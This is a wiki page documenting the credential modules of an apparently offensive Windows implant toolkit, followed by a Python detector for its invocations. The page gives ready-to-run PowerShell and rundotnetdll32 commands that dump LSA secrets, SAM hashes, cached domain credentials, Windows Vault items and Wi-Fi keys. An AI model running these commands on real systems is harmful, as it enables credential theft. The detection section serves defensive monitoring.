
Credential Modules

Alexander edited this page Oct 16, 2018 · 2 revisions

LSA Secrets

Overview

Reads the LSA Secrets (e.g. plaintext service logon credentials) from the Windows Registry. Requires SYSTEM privileges.

PowerShell

[WheresMyImplant.Credentials]::DumpLSA()

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpLSA

SAM

Overview

Reads the local user password hashes from the registry. Requires SYSTEM privileges.

PowerShell

[WheresMyImplant.Credentials]::DumpSAM()

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpSAM

Domain Cached Credentials

Overview

Reads the cached Domain User credentials. Requires SYSTEM privileges.

PowerShell

[WheresMyImplant.Credentials]::DumpDomainCache()

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpDomainCache

Windows Vault

Overview

Reads the Windows Vault for items stored with the DPAPI.

PowerShell

[WheresMyImplant.Credentials]::DumpVault()

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpVault

Windows Vault CLI

Overview

Reads the Windows Vault for items stored with the DPAPI. This is an alternative method of accessing the Windows Vault.

PowerShell

[WheresMyImplant.Credentials]::DumpVaultCLI()

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpVaultCLI

Wireless PreShared Keys

Overview

Reads wireless preshared keys from the stored wireless profiles.

PowerShell

[WheresMyImplant.Credentials]::WirelessPreSharedKey()

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,WirelessPreSharedKey
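
For detection, the two invocation forms documented above can be matched in PowerShell script block logs (event 4104) and process creation command lines (event 4688). The following is an added example, not part of the WheresMyImplant project; the event dictionaries, host names and the `detect` helper are constructed for illustration.

```python
import re

# Method name -> credential store, exactly as listed on this page.
STORES = {
    "DumpLSA": "LSA Secrets",
    "DumpSAM": "SAM",
    "DumpDomainCache": "Domain Cached Credentials",
    "DumpVault": "Windows Vault",
    "DumpVaultCLI": "Windows Vault CLI",
    "WirelessPreSharedKey": "Wireless PreShared Keys",
}
# PowerShell type and member names are case-insensitive, so look up in lower case.
_BY_LOWER = {name.lower(): (name, store) for name, store in STORES.items()}

# PowerShell form: [WheresMyImplant.Credentials]::Method()
PS_CALL = re.compile(r"\[\s*WheresMyImplant\.Credentials\s*\]\s*::\s*(\w+)", re.I)
# rundotnetdll32 argument form: <dll>,WheresMyImplant,Credentials,<Method>
# Matched on the argument alone so the result does not depend on file names.
ARG_CALL = re.compile(r",\s*WheresMyImplant\s*,\s*Credentials\s*,\s*(\w+)", re.I)

def detect(events):
    """Return one finding per documented invocation seen in the events."""
    findings = []
    for ev in events:
        text = ev["text"].replace("`", "")  # drop PowerShell escape ticks
        for channel, rx in (("powershell", PS_CALL), ("rundotnetdll32", ARG_CALL)):
            for m in rx.finditer(text):
                seen = m.group(1)
                name, store = _BY_LOWER.get(seen.lower(), (seen, "unlisted method"))
                findings.append({"host": ev["host"], "event_id": ev["event_id"],
                                 "channel": channel, "method": name, "store": store})
    return findings

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS01", "event_id": 4104,
     "text": "[WheresMyImplant.Credentials]::DumpLSA()"},
    {"host": "WS02", "event_id": 4688,
     "text": "rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Credentials,DumpSAM"},
    {"host": "WS03", "event_id": 4104,
     "text": "[wheresmyimplant.credentials]::dumpvaultcli()"},
    {"host": "WS04", "event_id": 4688,
     "text": "r.exe C:\\Temp\\x.dll,WheresMyImplant,Credentials,WirelessPreSharedKey"},
    {"host": "WS05", "event_id": 4104, "text": "Get-ChildItem C:\\Users"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

String matching of this kind only catches unmodified invocations; pair it with auditing of the underlying stores the modules read.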